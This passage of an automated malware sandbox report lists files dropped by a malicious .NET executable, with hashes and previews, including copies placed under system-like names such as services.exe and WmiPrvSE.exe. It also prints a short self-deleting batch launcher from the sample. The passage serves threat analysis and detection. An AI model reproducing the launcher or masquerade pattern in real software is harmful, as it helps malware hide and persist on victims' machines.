            SHA-512:610EC31B7FC52983CA0ECEA8C9A920CC1C07EDCFC05B9B2097904B18CC72E1E04492A37E3FC9EDDA707E9D64789F97C1E73139CEC9F3D963A4A2A8B85E550693
            Malicious:false
            Preview:1qF0VHB4jHSfXGBkIWlnMYenToU6yPAKS8PWvSFA2kb6hrOJ9spWBzocMbhrxEFUGHMY0oyzRlvl7iFmZK6GkoJdUwKTvYNxeHzafzSU4zFaECfnV4RmH9tc7sEEeeE3X7HzspGk2mMuitYSQg80GkpfXXcwvO0ZvLCH5q5qxrufw93OTwx7gNwwRlbVNUynww9XqRWklRCZ0KsYdOc8b22hZPzTOkcd2GtA9ghCZMWOKX6G2D1910M33b8bbDWBzjhtbsZ6qajOfoXBTsbKsdlC4zGhiGkW0VZl0MpKo5SbQ8XPE6HsmLSV7ezlm1Yk0MYKOwLGDRgxLKv6b0dm81uoCEnVXDhwhskEjNASuBpVpfKws3KwYvl9cuHKI0s9ttQckrWOzK26LY8g41me3vYvHllzF0K3Sql6PrMBh66O3oxDvlQRNOG8VeV8GgI8A8ofxCRMol77yK1cyhEek2qEknkuVN5Ax7N5ARQsTDmmRIKKm3KicoYHSj5Jbg0ap6K066bgQVKgQDxbdZHcDWiIjGnbWGQxMM7U8TOqboRGe11OweqBYYXTYBR0SAKKEWTEGccJLbBZEborOYo2ZPZyyn67BXXaeHCHixIUBg07W8O6Xkl4WRuz7fPcffIxDk56ZgJbQU13Ycb0ZAjbwdEMXMKCiqyfYC4wDRg1bKnBa1afDYDf5qBjfsiNVG3jgVeWipxHds9l0Dvgvp9JnSjrAUQUtTfVRDfFWE6Yl5BNratc7BbqHu6NvwVNYdYKNoUwiqKqskhrRWAklyXr1zNhGRTktt9Ih09CF64Q1u7gMP5ZvulkGqTXbxpQXj78lZJaW8fo3GzG1rU1W

            C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files\MSBuild\48b6e448d1d68f

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (468), with no line terminators
            Category:dropped
            Size (bytes):468
            Entropy (8bit):5.849524438303441
            Encrypted:false
            SSDEEP:12:9SCB9VhjZ9YvM2dC848zixxXT8dPQBxzlGej3V:97B9LjZ9YU2f48zixxDZDlGeZ
            MD5:9C29471513CA017110AF3860CAC716DF
            SHA1:19A976FCFCFE7EBFB25A412031955FD91D40AC87
            SHA-256:5FAA76F6D90391105755490B7CE29819CAB7A0180C38D3F29F226A3E66A367D8
            SHA-512:DCAEAD1BB72B5A9D8452DFD869A04BE4829A323E0F06BC18CE5BE3683D4DB927EA660C6D14D8C429AC3735FF4868AD76567B5E0DF2B64A67E1348A0C96D559E3
            Malicious:false
            Preview:LTMpxh0MaAk8ASIfl1mqTrDms8oQDeSOIvKXDeDZdCCo7uxjK9KJbrJeQk6y2kI5rW0PIucHyMMRoYp8LFFEUJwampHdiOh33H6k3ibagDUOe1z147nxeDkijamcn9jkpTXgcEFmnphRzi5u0PikluZzhYBc59xheujLeSY02BJygSsBf2mXb8853h9EDmqo2AxE8tPh1ssklkTOp97DXZGfvnS7TUwPUe6gfnCvmEgtQYUSNvZEomRc3STVbSOg5dPGoxtB6MbS3XPWT9th5skrMemMUrUU09xwJNoaCXHcL9igC6BbiqlM2h4KLgrP1Hb4jcNFVTehlHgN5GKXp3vKXk4lTePgq1lEio6ks6FPLDluBqOEVTk8VRg8imv1E81tgbpRJkptxf8U9JjmPKKWRmsQI7CFKOLML1OkB75vn0L0SL9YDJl3xfc3sYJLhjiiTvIH49kSOYsab286

            C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files\Windows Defender Advanced Threat Protection\c5b4cb5e9653cc

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (782), with no line terminators
            Category:dropped
            Size (bytes):782
            Entropy (8bit):5.885454318039116
            Encrypted:false
            SSDEEP:12:2JtADLUvBT9xgKRL+++JXykOViijMEIkR3KLG5DNXf/CraVEJsWoG4yWxJ9NBw83:RDL2BwKReCri8p6q1NX3CrF9s9XbXr
            MD5:4B70671D63098F5FE066D32D4FBD6167
            SHA1:51F0FE23049814E58DDA21A31643BCB1A98ACAC0
            SHA-256:787CBF854535030C0902EB5C83413BF2F45B82EC736B42868744285C9B2A2A16
            SHA-512:A140FAFFDCDCBA3BF37D0B793D722180290C72593E5C6C99204EE5F581809DBE8AE4BE4D7417E1057900E12D23238CE8035AD9E425065C5FC3E012741DE46C85
            Malicious:false
            Preview:6zsftFcilIisJxrEPtpZ3zOBWXPsPliZKNaLvFxcW3kj68Y95SNWcK2HlrJWzuTAkIi5XgSJ5NCAOpEX9Pw6XL79UTkD6bmmkk9xacmZ9DbOI225nvXk7WmZLikE5PNdlZZopR6gnW6Uut0caoaKEBpN8km21hdu07ntdOQWz06kaRobrInRzCZjuLpFoEoF3LewGH9MYEVNEExq5KKt3M5xiD8RiKruM1rOx2VjJb3vrLeqY9Kd35LrQqOCJsoNWkBNWj3DzkkcTKFWjS2jAO0RpA7GnTabwpYGKQTzFGoTUsYGk2d0zENIuuiWlwZfKJpov9MS9Dd3jh66m1fvzklrbPWas6NTrIILDtUlqL0vlUjMxmuuQoqkh7MfmvkDzKMaYu32g4EotzGGqKmGMdCCcioFhy94lx6bIIxDs2NWjC0r1FzcJd1VHJ8zGyVr5KD53o8iWiXTPqcar6Nb9guH6kU8J764hgbZ85yNHQFkGhGbqiHKk3rYa58SU9ZYmdwtODbwHATtbJAZe2RkzwTnyD8C7g2H1q8nuWMnHVCkj87Q5ixbryizJJ5LEYzlHM1uKXpHpodettDzGrHYsaZDHJelbBitgbcXHMGh3qvDUEGaFFFWQa2qwymB3EqoGu7RQqs3lkeCpWsDCDfV6LcFjvkSkFoz9H7kHyJZXLvq60BaFj8ziUr4R1sfFZTg5pChZI5O4G8uawJstKNAGzQpZCSPGoT82PuQydB7nu4cW7efs9v5LSZGYWIWzqHQw92KB24PJQXW4x

            C:\Program Files\Windows Defender Advanced Threat Protection\services.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files\Windows Sidebar\24dbde2999530e

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):201
            Entropy (8bit):5.706431159694625
            Encrypted:false
            SSDEEP:6:WYPIda0fGPKRlvvNDLRSt/pot40Um6QC/lBi1brQzBv:vPIdFBplStqUXQmlBi1brQzBv
            MD5:D11FA06CEEDA5A06C782290C522E5E17
            SHA1:ABE7E3F29600916D385F83714033BF4B6C9846B8
            SHA-256:99D68D4565D727A638A0F090AAD57564D2D0C74B6F200F9B85CAC4E5A6563B41
            SHA-512:56814ECBAAF2A39D439747855FF84366AECAFA74D450DF2DE14DD60C0DED923A872A0DB37443C29DAF5BC87C89412F6E0A5BBCA2497C16DE483FD6A2C25281B5
            Malicious:false
            Preview:NdYkDRjy3k2n86x60kJshI2SzkIEOtwpJIzBc47X4UsJ24qYKElj4JoFkFudIfjKyMe0Hvd5mvxNZta53u4KHNvAetbWKeOZviVpa0RZkp7IVbp0pykYlZCkbeWXTGvIhYb1YufDcfjcQnoDDlrV4zyWfuO5d3Fd4yl79yb4Tg6FzkUx0TUsZaOrjFWogjjjaGhbCqDPJ

            C:\Program Files\Windows Sidebar\WmiPrvSE.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Recovery\24dbde2999530e

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (831), with no line terminators
            Category:dropped
            Size (bytes):831
            Entropy (8bit):5.907535247871906
            Encrypted:false
            SSDEEP:12:E1E/jy2xf9pK4hRKQuOvtvZe0vAEuXTC5gtKQlIiTkaLBwuGLI+gk7yvPOICAqW5:EWLf9kU9uORY0vA7C6KSlOwxyI3F
            MD5:63E89DFB9D96B8120250DD232A0350C0
            SHA1:5470640004F1DB7A7281E5D144C599976849C732
            SHA-256:A0B4625A78448E34B911F793B7AEDDC83E9FAB68F35844099BCE2CBF9C8F3356
            SHA-512:C096A6D1C6A0EE5C497715A3BA2CECFD8C5BD557279FA3D06BD9636C92EC1C90AF978DFA109AC13ADC2628B6C4CA8178B7972345DF56937308FAD7BDD21843D2
            Malicious:false
            Preview:o1bVoH6moqWETd0Efv55DMlDqyCJBXYNSVXAd4fIauPH6XOUqBWm0owcQXpzFwkQSJv8GzllQweS6eGSksd9AvWnj5uFPpDnJ9zxlQN1avVEJdfwRWPXTlPgxHYLFfWlt1J6oTqUemiPZSeFZ7y2aqThuSAd1Cv4ZuUSTiH8p42qCAGfnTvHqdKDhlMVSMdb0nzo7Lv0z0MfxmftMf0hQoO5kRusWwpdbb0YKbhch5R0QoQ4GcJxW5KMZ3EqaDeDKtEWwGju7XAVWXp5Bzl3m1GgQn8QX1BebNphk3I93Y084zzCOIplbkaSnhFIHTXFWg4JrIVHrmAOBHlby6BOMaC0wW3Cy91jBumY4qUGxh3zkMRf6oULSI36dEWUOSTruaMQfNgHl4bogNPkFYGJpqR21p4zUA2eOLEJ9AAsHMkXrOaQyvP0MJCEJUZ0SqxlC6aVIGkFXXBdF4LnPoBiuCSEJAAplJZbY9VuyEHsKKcyIj8PJwlopO0AnVMIF5eO8kEGiayKhSXkje6jBvgyivvKJUHd28nPqOzie2qs7aGX0PaJZmGUZppMy47OTVRjpI4VoXFJEx1HpXT337DQ1SzAjntk4cZmJhrrUFeBg7PmyhgbkDUVRArWT3vBofOmXP8IqljydCu4CNMBGS91HEUIzUYaTdXBsmOjiYu9ef2PQxUFru4VgXeT4zSVMIe9otLZ8ncrh9WmME2CATtjjCeVI5otGZwWB2khl4GDRMxgA2Hz7PU3Y5amOzRD9tkHNAkTdUbGMpSWO8VPyyw1F37Gc8TwmDEilqT9RxWmyNrtnDYPeCPL7tCUDe1fBpe

            C:\Recovery\48b6e448d1d68f

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (786), with no line terminators
            Category:dropped
            Size (bytes):786
            Entropy (8bit):5.91545973380718
            Encrypted:false
            SSDEEP:12:GWVypSd3IiILy6U+nx91OdQYVQqkq5EAvAaWjM/5YOsg55d90mBo0gAUc+oIMcmT:GWysCg6fx91OXVSqPvRJbxNvUmrQw
            MD5:44ABA634FFF0DA65387AA0228C97ADEC
            SHA1:B17BAC9EAD6F16F7E751BE62FFE134F8D79F0790
            SHA-256:BF1928D828DB16B365AF4150941626886BE01C6E7D43D4CDF59C807272D839DD
            SHA-512:0727D8B8B961C4213FEBC28F0C70590BB84090BCC8AD1BF1CE75AD2DD3476AA2279A4E54195187437A1C84731E0564D74156147F0F9A80E2B5F92F7F54DC6C9A
            Malicious:false
            Preview:TAWvpe4kfg4U4DlS8S03ozWMqQDkoVk5wO6vd3uc1BnbI58YpEqIlLIenJFZaT6J69hqGzyEiXBmL5EuRp5kpbUlGcHTyUChFdeJXSRzPmjNJfSrFUIvYVeep6joseQOVdhrb5W8YFUD2GbkJaOdMQJt9AebsmHvVV2q7kQJ8JXSBbmie8fRPwBFUysab5Pv8jrgNvnjJEfD20rhY56uHzfiTxWJ1zsC3mUcuFUsV5IKR8MdGLCf8fnIDINaZdrTVcKQfPxTkOYLrURUk2CqxNEX8MYl13T1Oyzyy571Xt5uGcas120gaAgIYwST0Mbq4h63fcgp5LTERTQfvpu9DwaORqaBmnALRPzjfhNZWKlPqc1EgxiKbcmIGsmzBfDRLHwBeq9OcUn3LLhzyVfzFztznrdx5YX0HTDjqzkzxUsHzs74KwAq9OMVY6YxMMSE7ww1H8J9vpCuHmA4tjnIXr03HsKtaxmkBoJC6FwLnB4ULbNw6eDnjKqQ52uYyZi8Cbtdc77oxbeWwgrpfYw6t9B173HEVXXNd6SustT9hZ0IpUeZLE3ZnlOCa1fjz3SZDQ2zO67vExZUJ2LnZs2Qd8k1sPU0NuJoGaFYboLOGHUzM43hq2KGAB5EpAH8mHhUovNsxwMuhnJWnvpxWxJVjCnEeAtahMm9k9LbrKt3qZjX1jb4VTmy7MulHINxDvNVAKvnkNGLDQpJdQN5iyENkxBYOjTi65z4MOWrxxTHNauqgkI15SOPq9uNIXYA4hPIbu7P3fHue69JCV1obb

            C:\Recovery\WmiPrvSE.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Recovery\bdoMPjmZJHMIJMdqEctkzcHPTiy.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\Public\Downloads\7a0fd90576e088

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):100
            Entropy (8bit):5.539819909835649
            Encrypted:false
            SSDEEP:3:HRHS809VheKEYZkhDoGdBd1Fv21MyzL6Z43hm1w:xy88bBkhDFdr1Fv21MyA6ow
            MD5:5938D19E7E6CD6BA63DCE0FB419771D9
            SHA1:00979271DFEA68A5DA2FCB8AABADE83C14BBC849
            SHA-256:D3CDD06D6FB8AB72286408470CF0193540E8EADD303473C0ADC2DC0379C26E58
            SHA-512:D265D40C6E59D4CDF8A76B7C46E0C2504615DF4E6D01ACDACEFE994BEF487567B70F14D3356DB3AB2CA7A8F07E28A0CB91C99891108B6A57E8435C4A9A1CF6C8
            Malicious:false
            Preview:KiWEek3Y4bwYt7XpsC2vJPEimX0y0haOFeYADBD0IRJxXZSZgCy2ho55dxcGtFhWBiSPiWmq8Bn1FRLMFbRxthraidgQj7HDuxwy

            C:\Users\Public\Downloads\explorer.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\user\817c8c8ec737a7

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):251
            Entropy (8bit):5.761053868364122
            Encrypted:false
            SSDEEP:6:fCLoLRWi36sBDgmHyn8d9yxZ+MWBCs5mqQKenndK:fCMAW6siwyn8dAsM+VQpndK
            MD5:B0784C712E0DB4169E61C73E150D5760
            SHA1:83C11AB0D793A15E03C998EDD965954362433F67
            SHA-256:4E9146A4C5B65CD58ADDD67D6F7A9564A7CB759CA702A9061687A5D530949DA1
            SHA-512:6C2BE36100337039F8C351E3A17B662EDD602E218F804982392254761F55EBB0A412FEA72A725994677C88B461FC3AAC85B4089A85D3F29D4E233F2337B59BAE
            Malicious:false
            Preview:wn27ZLdutAkKxguic3la1guwu7rVLtT8aFEAjeOcNzdM28u3ouvxkLXP3GNcdHiArmurbu98pINBCh3vMyra8fYOszGcQw9FQdfPOCb4vwIc8VMWMbPoaICLOg9mngr2IIvjBohJXxpLX5PWmuQzhUoIbUBsDyQOFPTzknVi3FRnc0xSQmA3Q1VxdmHqnyGjgbFImaw8Zr5bDApkhscbxW7O3gW7fo5F9sHBvoq00Bei54uc7hJ4WpvJd1O

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\comProviderServer.exe.log

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1915
            Entropy (8bit):5.363869398054153
            Encrypted:false
            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpaq2
            MD5:E6E3A2B5063C33228E2749DC291A1D3D
            SHA1:F3F32E2F204DE9AFA50D5DE1C132A8039C5A315C
            SHA-256:2F6BA7ECDDEF02B291DEA6E03ADD8A30A67B8DE1B7E256FA99B14A28AB9BE831
            SHA-512:15EF30345C2F08AD858A9E5C10CD309F00D1951E4A4902CE8F8700A2B0A25FCFADCFCDA6D13EC7B215B0AF1AB24C8956033E93A403178ED7A98138476D4F9967
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

            C:\Users\user\AppData\Local\Temp\uw0cV3nz2C

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):25
            Entropy (8bit):4.213660689688185
            Encrypted:false
            SSDEEP:3:zSMSjdgmSoSMRn:ZigloSQn
            MD5:4F1E3BAEC0E1C6AD2009F1E1B6D60B01
            SHA1:653C023086FD859727C11BF57ABCCDAF3C75AE54
            SHA-256:1AA2DD35E51EEB74A1470DEB25729E6CCD37DBFF721DE3322BD9ADA709D6BF78
            SHA-512:D9EDEA9D8C9D121BAAF755F6A486DA63FB290BF4079C64C9DA7FF8372C5BE1282ECECAEDBFBA16674296FA1AFB1A32A61F27382B30FD6AF9A045089622CB71FB
            Malicious:false
            Preview:mkw2YS9w3A8eAsU67i4akwBit

            C:\Users\user\AppData\Local\Temp\vEbYiTsQ2u.bat

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:DOS batch file, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):216
            Entropy (8bit):5.173550804439114
            Encrypted:false
            SSDEEP:6:hITg3Nou11r+DERuVzWKOZG1cNwi23fY8Mxr:OTg9YDEIVLZg8C
            MD5:3BBBF5E84D1083D4FA6762546A4C6D0E
            SHA1:E0575929B630BE01BA0798AC8005C133B677F755
            SHA-256:84D3596770CA2FE9A4C53947C5EFE23721F5D713B5585E9BEAE9EF58B5EC3C8C
            SHA-512:2B0CD1ACB5A43A63D3B0C1702EDC8ABD0A1DDEE93C200334D312A82DBB483AB6418B8040C9201750E9261B6AB111A5ECDD0232D1D8922B7E44B6E767A691AE5C
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Windows\ELAMBKUP\StartMenuExperienceHost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\vEbYiTsQ2u.bat"

            C:\Users\user\wscript.exe

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):2454528
            Entropy (8bit):7.617633665179232
            Encrypted:false
            SSDEEP:49152:LKkiIZreDioaAidp6UsmSqmpCmMvG9gxmvZ6TUXxi:LKkizioaAidp6UPSH0ttmx6TUXx
            MD5:DEF21977FE76F2744669724D9A26A39F
            SHA1:551A5E45C867746CD8827DA53E0EDB83CE3142A1
            SHA-256:CD7E520EF631E39FAB8C8A85306665E8EF3BF12B35F4034FA745A3C9071181AF
            SHA-512:308C03FA265A6D08C8B7EE4A3863E288E0FBBE187B63CDB88BB436F6B1AE2E2843DD3B6FFF23A2D7C08F170A8F11F9442EAEC07EA0C9160F4D5467F74984241E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................:%..6......NY%.. ...`%...@.. ........................%...........@..................................Y%.K.....%.......................%...................................................... ............... ..H............text...T9%.. ...:%................. ..`.sdata.../...`%..0...>%.............@....rsrc.........%......n%.............@..@.reloc........%......r%.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\48b6e448d1d68f

            Download File
            Process:C:\reviewDriverIntosessionnet\comProviderServer.exe
            File Type:ASCII text, with very long lines (338), with no line terminators
            Category:dropped
            Size (bytes):338
            Entropy (8bit):5.81681059859829
            Encrypted:false
